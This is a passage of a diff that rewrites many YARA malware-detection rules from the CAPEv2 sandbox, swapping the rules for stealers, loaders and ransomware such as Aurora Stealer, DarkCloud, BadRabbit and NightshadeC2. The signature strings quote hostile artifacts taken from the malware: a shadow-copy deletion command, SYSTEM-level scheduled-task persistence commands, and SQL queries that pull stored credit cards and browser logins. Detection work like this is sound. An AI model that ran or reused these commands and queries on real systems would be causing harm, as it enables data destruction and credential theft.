+		$decrypt_config1 = {FF 37 83 C3 EC 53 8B 5D 0C 8D 43 14 50 6A 14 53 E8 ?? ?? ?? ?? 83 C4 14 85 C0 ?? 26 ?? ?? 86 20 02 00 00 66 85 C0 ?? ?? FF 37 FF 75 10 53}
+		$decrypt_config2 = {8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C 08 00 00}
+		$decrypt_config3 = {6A 13 8B CE 8B C3 5A 8A 18 3A 19 75 05 40 41 4A 75 F5 0F B6 00 0F B6 09 2B C1 74 05 83 C8 FF EB 0E}
+		$call_decrypt = {83 7D ?? 00 56 74 0B FF 75 10 8B F3 E8 [4] 59 8B 45 0C 83 F8 28 72 19 8B 55 08 8B 37 8D 48 EC 6A 14 8D 42 14 52 E8}
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5A4D and any of ( $* )
 }
-rule CAPE_Aurorastealer : FILE
+rule CAPE_Eternalromance : FILE
 {
 	meta:
-		description = "detects Aurora Stealer samples"
-		author = "Johannes Bader @viql"
-		id = "07779318-3e5d-5e67-8c04-f3f70d7e48b7"
-		date = "2022-12-14"
-		modified = "2023-03-31"
+		description = "EternalRomance Exploit"
+		author = "kevoreilly"
+		id = "34035076-9dda-5e32-bd0b-d0257a96329b"
+		date = "2019-10-30"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AuroraStealer.yar#L1-L74"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "0d10e9268184f494a73d5b4ab0d9a478ad0c26d2ef13d5134f8c9769f028b8f5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/EternalRomance.yar#L1-L33"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "5390fae3e2411a715cdc965df8648c0c4c511d53d5f76031714f1b784b58eb0d"
 		score = 75
-		quality = 45
+		quality = 68
 		tags = "FILE"
-		version = "v1.0"
-		tlp = "TLP:WHITE"
-		malpedia_family = "win.aurora_stealer"
-		hash1_md5 = "51c153501e991f6ce4901e6d9578d0c8"
-		hash1_sha1 = "3816f17052b28603855bde3e57db77a8455bdea4"
-		hash1_sha256 = "c148c449e1f6c4c53a7278090453d935d1ab71c3e8b69511f98993b6057f612d"
-		hash2_md5 = "65692e1d5b98225dbfb1b6b2b8935689"
-		hash2_sha1 = "0b51765c175954c9e47c39309e020bcb0f90b783"
-		hash2_sha256 = "5a42aa4fc8180c7489ce54d7a43f19d49136bd15ed7decf81f6e9e638bdaee2b"
-		cape_type = "AuroraStealer Payload"
+		cape_type = "EternalRomance Exploit"
 
 	strings:
-		$str_func_01 = "main.(*DATA_BLOB).ToByteArray"
-		$str_func_02 = "main.Base64Encode"
-		$str_func_03 = "main.Capture"
-		$str_func_04 = "main.CaptureRect"
-		$str_func_05 = "main.ConnectToServer"
-		$str_func_06 = "main.CreateImage"
-		$str_func_07 = "main.FileExsist"
-		$str_func_08 = "main.GetDisplayBounds"
-		$str_func_09 = "main.GetInfoUser"
-		$str_func_10 = "main.GetOS"
-		$str_func_11 = "main.Grab"
-		$str_func_12 = "main.MachineID"
-		$str_func_13 = "main.NewBlob"
-		$str_func_14 = "main.NumActiveDisplays"
-		$str_func_15 = "main.PathTrans"
-		$str_func_16 = "main.SendToServer_NEW"
-		$str_func_17 = "main.SetUsermame"
-		$str_func_18 = "main.Zip"
-		$str_func_19 = "main.base64Decode"
-		$str_func_20 = "main.countupMonitorCallback"
-		$str_func_21 = "main.enumDisplayMonitors"
-		$str_func_22 = "main.getCPU"
-		$str_func_23 = "main.getDesktopWindow"
-		$str_func_24 = "main.getGPU"
-		$str_func_25 = "main.getMasterKey"
-		$str_func_26 = "main.getMonitorBoundsCallback"
-		$str_func_27 = "main.getMonitorRealSize"
-		$str_func_28 = "main.sysTotalMemory"
-		$str_func_29 = "main.xDecrypt"
-		$str_type_01 = "type..eq.main.Browser_G"
-		$str_type_02 = "type..eq.main.STRUSER"
-		$str_type_03 = "type..eq.main.Telegram_G"
-		$str_type_04 = "type..eq.main.Crypto_G"
-		$str_type_05 = "type..eq.main.ScreenShot_G"
-		$str_type_06 = "type..eq.main.FileGrabber_G"
-		$str_type_07 = "type..eq.main.FTP_G"
-		$str_type_08 = "type..eq.main.Steam_G"
-		$str_type_09 = "type..eq.main.DATA_BLOB"
-		$str_type_10 = "type..eq.main.Grabber"
-		$varia_01 = "\\User Data\\Local State"
-		$varia_02 = "\\\\Opera Stable\\\\Local State"
-		$varia_03 = "Reconnect 1"
-		$varia_04 = "@ftmone"
-		$varia_05 = "^user^"
-		$varia_06 = "wmic path win32_VideoController get name"
-		$varia_07 = "\\AppData\\Roaming\\Telegram Desktop\\tdata"
-		$varia_08 = "C:\\Windows.old\\Users\\"
-		$varia_09 = "ScreenShot"
-		$varia_10 = "Crypto"
+		$SMB1 = "Frag"
+		$SMB2 = "Free"
+		$session7_32_1 = {2A 02 1C 00}
+		$session7_64_1 = {2A 02 28 00}
+		$session8_32_1 = {2A 02 24 00}
+		$session8_64_1 = {2A 02 38 00}
+		$session7_32_2 = {D5 FD E3 FF}
+		$session7_64_2 = {D5 FD D7 FF}
+		$session8_32_2 = {D5 FD DB FF}
+		$session8_64_2 = {D5 FD C7 FF}
+		$ipc = "IPC$"
+		$pipe1 = "atsvc"
+		$pipe2 = "browser"
+		$pipe3 = "eventlog"
+		$pipe4 = "lsarpc"
+		$pipe5 = "netlogon"
+		$pipe6 = "ntsvcs"
+		$pipe7 = "spoolss"
+		$pipe8 = "samr"
+		$pipe9 = "srvsvc"
+		$pipe10 = "scerpc"
+		$pipe11 = "svcctl"
+		$pipe12 = "wkssvc"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 32 of ( $str_* ) or 9 of ( $varia_* ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $SMB* ) ) and $ipc and ( any of ( $session* ) ) and ( any of ( $pipe* ) )
 }
-rule CAPE_Kovter : FILE
+rule CAPE_Darkcloud : FILE
 {
 	meta:
-		description = "Kovter Payload"
-		author = "kevoreilly"
-		id = "3dec3c4b-4678-5ed1-a4c3-c3d9abb58b1c"
-		date = "2019-10-30"
-		modified = "2019-10-30"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Kovter.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "888fccb8fbfbe6c05ec63bc5658b4743f8e10a96ef51b3868c2ff94afec76f2d"
+		description = "No description has been set in the source file - CAPE"
+		author = "YungBinary"
+		id = "b3071be2-07b0-5242-a985-7bb23fef258c"
+		date = "2025-10-16"
+		modified = "2025-10-16"
+		reference = "https://x.com/YungBinary/status/1971585972912689643"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/DarkCloud.yar#L1-L39"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "e9a67fce4c1e4ffa7322c225522263aa4db94ae9f29113a81f5216fb4fa68b57"
 		score = 75
-		quality = 70
+		quality = 68
 		tags = "FILE"
-		cape_type = "Kovter Payload"
+		cape_type = "DarkCloud Payload"
 
 	strings:
-		$a1 = "chkok"
-		$a2 = "k2Tdgo"
-		$a3 = "13_13_13"
-		$a4 = "Win Server 2008 R2"
+		$darkcloud1 = "===============DARKCLOUD===============" fullword wide
+		$creds1 = "@GateUrl" wide
+		$creds2 = "@StrFtpUser" wide
+		$creds3 = "@StrFtpPass" wide
+		$creds4 = "@StrFtpServer" wide
+		$creds5 = "@StrReceiver" wide
+		$creds6 = "@StrSmtpUser" wide
+		$creds7 = "@StrSmtpPass" wide
+		$sql1 = "SELECT item1 FROM metadata" wide
+		$sql2 = "SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards" wide
+		$sql3 = "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins" wide
+		$sql4 = "SELECT address FROM ConversationRecipients" wide
+		$sql5 = "SELECT address FROM ConversationSenders" wide
+		$app1 = "Application : Pidgin" wide
+		$app2 = "Application: CoreFTP" wide
+		$app3 = "Application: WinSCP" wide
+		$app4 = "Application: Outlook" wide
+		$app5 = "Application : FileZilla" fullword wide
+		$fingerprint1 = "Computer Name: " fullword wide
+		$fingerprint2 = "OS FullName: " fullword wide
+		$fingerprint3 = "CPU: " fullword wide
+		$fingerprint4 = "SELECT * FROM Win32_Processor" fullword wide
+		$fingerprint5 = "SELECT * FROM Win32_OperatingSystem" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5a4d and ( $darkcloud1 and 1 of ( $creds* ) or ( 3 of ( $creds* ) and 1 of ( $sql* ) ) or ( 2 of ( $sql* ) and 2 of ( $app* ) ) or ( 2 of ( $creds* ) and 2 of ( $fingerprint* ) ) or ( 2 of ( $app* ) and 2 of ( $fingerprint* ) and 1 of ( $sql* ) ) )
 }
-rule CAPE_Kpot : FILE
+rule CAPE_Atlas : FILE
 {
 	meta:
-		description = "Kpot Stealer"
+		description = "Atlas Payload"
 		author = "kevoreilly"
-		id = "724fd6ac-e734-5952-b459-01cbaffdb89d"
-		date = "2020-10-19"
-		modified = "2020-10-19"
+		id = "22322e5c-ded6-56df-8a39-a8f5cbc18239"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Kpot.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "75abaab9a10e8ac8808425c389238285ab9bd9cb76f0cd03cc1e35b3ea0a1b0f"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Atlas.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "c3f73b29df5caf804dbfe3e6ac07a9e2c772bd2a126f0487e4a65e72bd501e6e"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Kpot Payload"
+		cape_type = "Atlas Payload"
 
 	strings:
-		$format = "%s | %s | %s | %s | %s | %s | %s | %d | %s"
-		$username = "username:s:"
-		$os = "OS: %S x%d"
+		$a1 = "bye.bat"
+		$a2 = "task=knock&id=%s&ver=%s x%s&disks=%s&other=%s&ip=%s&pub="
+		$a3 = "process call create \"cmd /c start vssadmin delete shadows /all /q"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Adaptixbeacon
+rule CAPE_Nanolocker : FILE
 {
 	meta:
-		description = "AdaptixBeacon Payload"
-		author = "enzok"
-		id = "ae0bc10c-cfcd-59d4-8c24-34a03debe370"
-		date = "2025-06-16"
-		modified = "2025-10-28"
+		description = "NanoLocker Payload"
+		author = "kevoreilly"
+		id = "6fff6a27-a153-5461-9a75-2253c2f7d408"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AdaptixBeacon.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "f78f5803be5704420cbb2e0ac3c57fcb3d9cdf443fbf1233c069760bee115b5d"
-		logic_hash = "2c1d09cd5e19e5a09dde65411691afd5922959d4a7b5232b28ebf56f26d2f07d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/NanoLocker.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "fe6c8a4e259c3c526f8f50771251f6762b2b92a4df2e8bfc705f282489f757db"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "AdaptixBeacon Payload"
+		tags = "FILE"
+		cape_type = "NanoLocker Payload"
 
 	strings:
-		$conf_1 = {8D ?? ?? E8 [3] 00 4? 89 [1-2] 4? 8B 4C 24 ?? E8 [3] 00 4? 8B 53 48 66 [0-1] 89 04 ?? E8}
-		$conf_2 = {E8 [3] 00 48 8B 4C 24 ?? 48 89 43 78 E8 [3] 00 48 8B 4C 24 ?? 89 83 80 00 00 00 E8 [3] 00 03 83 80 00 00 00 48 8B 4C 24}
-		$conf_3 = {E8 [3] 00 4? 8B 4C 24 ?? 4? 89 ?? 4? 89 43 58 E8 [3] 00 4? 8B 4C 24 ?? 4? 89 ?? 4? 89 43 60 E8 [3] 00 4? 8B 4C 24 ?? 4? 89 ?? 4? 89 43 68}
-		$conf_4 = {8D ?? ?? 4? 89 ?? FF ?? 4? 89 ?? 4? 89 ?? 4? 8B ?? FF ?? ?? 4? 8B ?? 48 66 ?? 89 ?? ?? EB}
-		$conf_5 = {48 89 ?? 4? 89 ?? FF ?? 4? 89 ?? 4? 89 D9 4? 89 ?? ?? 4? 8B 03 FF ?? ?? 4? 89 ?? 4? 89 ?? 4? 89 ?? ?? 4? 8B 03 FF ?? ?? 4? 89}
-		$wininet_1 = {B9 77 00 00 00 [0-4] E8 [4] B9 69 00 00 00 88 ?4 24 [0-4] E8 [4] B9 6E 00 00 00 88 ?4 24}
-		$wininet_2 = {B9 69 00 00 00 88 ?4 24 [0-4] E8 [4] B9 6E 00 00 00 88 ?4 24 [0-4] E8 [4] B9 65 00 00 00 88 ?4 24}
+		$a1 = "NanoLocker"
+		$a2 = "$humanDeadline"
+		$a3 = "Decryptor.lnk"
 
 	condition:
-		1 of ( $conf_* ) and 1 of ( $wininet_* )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Amadey : FILE
+rule CAPE_Nightshadec2 : FILE
 {
 	meta:
-		description = "Amadey Payload"
-		author = "kevoreilly, YungBinary"
-		id = "81d251a2-84c3-524c-8ea5-c92ca8764777"
-		date = "2021-02-18"
-		modified = "2025-08-15"
+		description = "NightshadeC2 AKA CastleRAT - https://x.com/YungBinary/status/1963751038340534482"
+		author = "YungBinary"
+		id = "d70f9051-c7ab-537a-ab80-03ae7ef80b81"
+		date = "2025-09-04"
+		modified = "2025-09-12"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Amadey.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "988258716d5296c1323303e8fe4efd7f4642c87bfdbe970fe9a3bb3f410f70a4"
-		logic_hash = "5a7405a174b63826500f3b04c6f10bc9b40d5b49e85377bef027204e75dd1e9e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/NightshadeC2.yar#L1-L20"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d"
+		logic_hash = "f9fabc391e21180a1c92abea0a5ded6d7669e8d8f2330b69d6c1227c9b4237a0"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Amadey Payload"
+		cape_type = "NightshadeC2 Payload"
 
 	strings:
-		$decode1 = {8B D1 B8 FF FF FF 7F D1 EA 2B C2 3B C8 76 07 BB FF FF FF 7F EB 08 8D 04 0A 3B D8 0F 42 D8}
-		$decode2 = {2B C8 8D 04 0A 33 D2 F7 F3 8B 5D ?? 8B CB 83 7B ?? 10}
-		$decode3 = {33 D2 8B 4D ?? 8B C7 F7 F6 8A 84 3B [4] 2A 44 0A 01 88 87 [4] 47 8B 45 ?? 8D 50 01}
-		$decode4 = {8A 04 02 88 04 0F 41 8B 7D ?? 8D 42 01 3B CB 7C}
+		$s1 = "keylog.txt" fullword wide
+		$s2 = "\"%ws\" --mute-audio --do-not-de-elevate" fullword wide
+		$s3 = "\"%ws\" -no-deelevate" fullword wide
+		$s4 = "MachineGuid" fullword wide
+		$s5 = "www.ip-api.com" fullword wide
+		$s6 = "rundll32 \"C:\\Windows\\System32\\shell32.dll\" #61" fullword wide
+		$s7 = "IsabellaWine" fullword wide
+		$s8 = "Shell_TrayWnd" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and 3 of them
 }
-rule CAPE_Hancitor : FILE
+rule CAPE_Scarab : FILE
 {
 	meta:
-		description = "Hancitor Payload"
-		author = "threathive"
-		id = "b4e9a26a-db00-5553-acc2-f35148b0ffd5"
+		description = "Scarab Payload"
+		author = "kevoreilly"
+		id = "2ba8ae50-1e56-5773-aaea-058161b59c78"
 		date = "2019-10-30"
-		modified = "2020-10-20"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Hancitor.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "84003542a2f587b5fbd43731c4240759806f8ee46df2bd96aae4a3c09d97e41c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Scarab.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "0d8fa7ab4c8e5699f17f9e9444e85a42563a840a8e7ee9eda54add3a6845d1c6"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Hancitor Payload"
+		cape_type = "Scarab Payload"
 
 	strings:
-		$fmt_string = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)"
-		$fmt_string2 = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)"
-		$ipfy = "http://api.ipify.org"
-		$user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
+		$crypt1 = {8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08}
+		$crypt2 = {8B 4C 82 0C 8B D9 C1 E3 18 C1 E9 08 0B D9 8B CB 0F B6 D9 8B 1C 9D AC 0C 43 00 89 5C 24 04 8B D9 C1 EB 08 0F B6 DB 8B 34 9D AC 0C 43 00 8B D9 C1 EB 10}
+		$crypt3 = {8B 13 8B CA 81 E1 80 80 80 80 8B C1 C1 E8 07 50 8B C1 59 2B C1 25 1B 1B 1B 1B 8B CA 81 E1 7F 7F 7F 7F 03 C9 33 C1 8B C8 81 E1 80 80 80 80 8B F1 C1 EE 07}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
@@ -65507,8 +65347,8 @@ rule CAPE_Emotetloader : FILE
 		date = "2022-05-31"
 		modified = "2022-05-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/EmotetLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/EmotetLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
 		logic_hash = "410872d25ed3a89a2cba108f952d606cd1c3bf9ccc89ae6ab3377b83665c2773"
 		score = 75
 		quality = 70
@@ -65521,320 +65361,242 @@ rule CAPE_Emotetloader : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Magniber : FILE
+rule CAPE_Badrabbit : FILE
 {
 	meta:
-		description = "Magniber Payload"
+		description = "BadRabbit Payload"
 		author = "kevoreilly"
-		id = "a704914f-2aa2-537d-975d-f8c23427951f"
+		id = "c7204772-6f14-57b7-88c1-e9156f9897d5"
 		date = "2019-10-30"
 		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Magniber.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "1875754bdf98c1886f31f6c6e29992a98180f74d8fa168ae391e2c660d760618"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/BadRabbit.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "309e14ab4ea2f919358631f9d8b2aaff1f51e7708b6114e4e6bf4a9d9a5fc86c"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Magniber Payload"
+		cape_type = "BadRabbit Payload"
 
 	strings:
-		$a1 = {8B 55 FC 83 C2 01 89 55 FC 8B 45 FC 3B 45 08 7D 45 6A 01 6A 00 E8 26 FF FF FF 83 C4 08 89 45 F4 83 7D F4 00 75 18 6A 7A 6A 61 E8 11 FF FF FF 83 C4 08 8B 4D FC 8B 55 F8 66 89 04 4A EB 16}
+		$a1 = "caforssztxqzf2nm.onion" wide
+		$a2 = "schtasks /Create /SC once /TN drogon /RU SYSTEM" wide
+		$a3 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal" wide
 
 	condition:
 		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Nitrogenloader
-{
-	meta:
-		description = "Nitrogen Loader"
-		author = "enzok"
-		id = "450dc039-c5d5-5d81-945c-def94671825f"
-		date = "2024-10-29"
-		modified = "2025-07-28"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/NitrogenLoader.yar#L1-L35"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "4aab353aacc8f6910884e722f2d57439891680963accb906c2cee245437732c6"
-		score = 75
-		quality = 68
-		tags = ""
-		cape_type = "NitrogenLoader Loader"
-		hash1 = "7b603d63a23201ff0b6ffa9acdd650df9caa1731837d559d93b3d8ce1d82a962"
-		hash2 = "50c2afd792bfe2966133ee385054eaae1f73b04e013ef3434ef2407f99d7f037"
-		hash3 = "4926dee7da0da522c34ffeebb32f28703fd689a52543332c8d28ccfea223f43a"
-
-	strings:
-		$stringaes1 = {63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76 ca 82 c9 7d fa}
-		$stringaes2 = {52 09 6a d5 30 36 a5 38 bf 40 a3 9e 81 f3 d7 fb 7c e3 39 82 9b}
-		$string1 = "GetComputerNameExA"
-		$string2 = "LoadResource"
-		$syscallmakehashes = {48 89 4C 24 ?? 48 89 54 24 ?? 4? 89 44 24 ?? 4? 89 4C 24 ?? 4? 83 EC ?? B? [4] E8 [3] 00}
-		$syscallnumber = {49 89 C3 B? [4] E8 [3] 00}
-		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
-		$decryptstr1 = {33 D2 48 8B 04 24 B? 0C 00 00 00 48 F7 F1 48 8B C2 48 C1 E0 02 0F B6 C8 48 8B 44 24 ?? 48 D3 E8 48 25 AB 00 00 00}
-		$decryptrsc1 = {48 63 4? 24 ?? 33 D2 48 [0-3] F7 B4 24 [4] 48 8B C2 48 8B 8C 24 [4] 0F BE 04 01}
-		$decryptrsc2 = {8B ?? 24 [1-4] 33 C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
-		$decryptrsc3 = {8B 8C 24 ?? ?? ?? ?? 2B C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
-		$decryptstrs = {33 D2 48 8B 04 24 B9 0C 00 00 00 48 F7 F1 48 8B C2 48 C1 E0 02 0F B6 C8 48 8B 44 24 ?? 48 D3 E8 48 25 AB 00 00 00}
-		$taskman_1 = {E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [4] B9 6B 00 00 00 88 84 24 [4] E8 [3] FF}
-		$taskman_2 = {B9 4D 00 00 00 88 84 24 [4] E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 6E 00 00 00 88 84 24 [4] E8 [3] FF}
-		$taskman_3 = {B9 61 00 00 00 88 84 24 [4] E8 [4] B9 67 00 00 00 88 84 24 [4] E8 [4] B9 65 00 00 00 88 84 24 [4] E8 [3] FF}
-		$taskman_4 = {B9 72 00 00 00 88 84 24 [4] E8 [4] 31 C9 88 84 24 [4] E8 [3] FF}
-		$installers_1 = {B9 49 00 00 00 E8 [4] B9 6E 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [3] FF}
-		$installers_2 = {B9 74 00 00 00 88 84 24 [4] E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 6C 00 00 00 88 84 24 [4] E8 [3] FF}
-		$installers_3 = {B9 6C 00 00 00 88 84 24 [4] E8 [4] B9 65 00 00 00 88 84 24 [4] E8 [3] FF}
-		$installers_4 = {B9 72 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [3] FF}
-		$rc4decrypt_1 = {48 89 ?? 4? 89 ?? E8 [4] 4? 8B ?? 24 [1-4] 4? 89 ?? 4? 89 ?? 4? 89 C1 [0-1] 89 ?? E8 [4] 4? 89}
-		$rc4decrypt_2 = {E8 [4] 8B ?? 24 [1-4] 4? 89 ?? 48 89 ?? 4? 89 C1 E8 [3] FF}
-
-	condition:
-		(2 of ( $string* ) and any of ( $syscall* ) ) or 4 of ( $decrypt* ) or ( ( 3 of ( $taskman_* ) or 3 of ( $installers* ) ) and all of ( $rc4decrypt_* ) )
-}
-rule CAPE_Agent_Tesla
+rule CAPE_Tclient : FILE
 {
 	meta:
-		description = "Detecting HTML strings used by Agent Tesla malware"
-		author = "Stormshield"
-		id = "5383994b-357d-539b-89b1-53be238f759d"
+		description = "TClient Payload"
+		author = "kevoreilly"
+		id = "38c9ea20-9d91-5fb0-8b3b-170538ad7ea8"
 		date = "2019-10-30"
-		modified = "2026-01-14"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AgentTesla.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "3945754129dcc58e0abfd7485f5ff0c0afdd1078ae2cf164ca8f59a6f79db1be"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/TClient.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "6edcd01e4722b367723ed77d9596877d16ee35dc4c160885d125f83e45cee24d"
 		score = 75
 		quality = 70
-		tags = ""
-		version = "1.0"
+		tags = "FILE"
+		cape_type = "TClient Payload"
 
 	strings:
-		$html_username = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii
-		$html_pc_name = "<br>PC&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii
-		$html_os_name = "<br>OS&nbsp;Full&nbsp;Name&nbsp;&nbsp;: " wide ascii
-		$html_os_platform = "<br>OS&nbsp;Platform&nbsp;&nbsp;&nbsp;: " wide ascii
